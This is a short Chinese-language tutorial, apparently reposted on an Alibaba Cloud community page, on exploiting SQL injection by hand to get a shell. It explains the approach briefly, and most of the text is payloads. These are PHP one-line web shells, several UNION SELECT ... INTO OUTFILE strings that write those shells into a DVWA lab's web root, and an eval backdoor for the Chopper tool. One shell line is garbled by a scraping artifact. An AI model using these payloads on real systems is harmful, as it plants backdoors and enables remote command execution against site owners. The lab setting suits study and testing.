SQL inject 漏洞手工利用過程詳解:get shell

來源:互聯網
上載者:User

標籤:sql

思路:上傳一個“後門”,通過控制後門來得到shell,比如一句話木馬。比如:

<?system($_REQUEST[‘cmd‘]);?> //通過request提交,執行shell<[email protected]($_POST[‘chopper‘]);?>

//PHP一句話木馬,直接上菜刀


這裡構造如下語句:

1‘and 1=2 union select "<?",system($_REQUEST[‘cmd‘]);?>"

into outfile "d:\\xampp\\htdocs\\dvwa\\yy.php"#



1‘ and 1=2 union select 1,"<?system($_REQUEST[‘cmd‘]);?>" into outfile "f:\\xampp\\htdocs\\dvwa\\zzz.php"--

650) this.width=650;" src="http://s4.51cto.com/wyfs02/M02/86/CF/wKiom1fLzO6w2AbHAAIURuE1dG4326.jpg-wh_500x0-wm_3-wmp_4-s_1679569698.jpg" title="cmd.jpg" alt="wKiom1fLzO6w2AbHAAIURuE1dG4326.jpg-wh_50" />



1‘ and 1=2 union select "<?","system($_REQUEST[‘cmd‘]);?>" into outfile "d:\\

xampp\\htdocs\\dvwa\\zzz.php"


<?php eval($_POST[‘888‘]);?>


1‘ and 1=2 union select 1,"<?php eval($_POST[‘888‘]);?>" into outfile "d:\\xampp\\htdocs\\dvwa\\yyy.php"#

SQL inject 漏洞手工利用過程詳解:get shell

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.